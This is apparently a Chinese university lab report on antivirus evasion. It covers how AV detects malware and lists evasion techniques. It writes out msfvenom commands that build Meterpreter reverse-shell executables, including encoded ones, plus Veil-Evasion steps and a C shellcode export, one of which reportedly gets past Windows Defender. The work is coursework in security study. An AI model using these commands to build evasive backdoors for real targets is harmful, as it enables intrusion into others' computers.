20145202马超《网络对抗》免杀

http://www.cnblogs.com/lxm20145215----/p/6602938.html

基础问题回答

（1）杀软是如何检测出恶意代码的？

检查她的特征码
特征行为
也可以检测片面的特征。
（2）免杀是做什么？
首先清楚杀毒软件的杀毒原理。
然后针对杀毒软件，自己相应的做出改变，防止杀毒软件检测出她的恶意行为。
（3）免杀的基本方法有哪些？
改变特征码
加壳：压缩壳加密壳
有shellcode(像Meterpreter）
用encode进行编码
基于payload重新编译生成可执行文件
改变行为
尽量使用反弹式连接
使用隧道技术
加密通讯数据
操作模式
基于内存操作
减少对系统的修改
加入混淆作用的正常功能代码
用其他语言进行重写再编译（veil-evasion）
使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。
使用社工类攻击，诱骗目标关闭AV软件。
纯手工打造一个恶意软件

实践总结与体会
国产的杀毒软件质量差的一笔，比如江民杀毒和熊猫杀毒。
做病毒病不需要太多的技术而杀毒相对来说要付出非常多的努力，我们要跟家中是保护自己的电脑。

离实战还缺些什么技术或步骤？

我们是通过工具完成的病毒的制作，以后再进一步的话就应该自己制作出来能够构造病毒的程序就好了。

实践过程记录

msfvenom直接生成meterpreter可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.115 PORT=1111 -f exe > test_mc.exe

windows自带的杀毒软剑直接杀掉了

Msfvenom使用编码器生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.199.133 LPORT=1111 -f exe > mc-encoded.exe
来生成编码的可执行文件然后上传：

还是直接被杀掉：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 8 -b ‘\x00’ LHOST=192.168.199.133 LPORT=1111 -f exe > mc-encoded-8.exe
八次编码：

还是不行：

Veil-Evasion生成可执行文件

veil-evasion打开软件：
use python/meterpreter/rev_tcp
set LHOST 192.168.199.107
generate
mc-winmine
1
这次windows没有查出来直接放行了

上传到网站试试：

C语言调用Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.180 LPORT=208 -f c
生成一个c语言格式的Shellcode数组：

被杀掉

后续

实验指导

[http://git.oschina.net/wildlinux/NetSec/blob/master/ExpGuides/MAL_免杀原理与实践.md?dir=0&filepath=ExpGuides%2FMAL_免杀原理与实践.md&oid=33c5eba4957170076ea3af894b7df662e3fd4b11&sha=3197ea17455bacf495e6e3397a4d6d355c3c111c]

转载于:https://www.cnblogs.com/tuolemi/p/6585974.html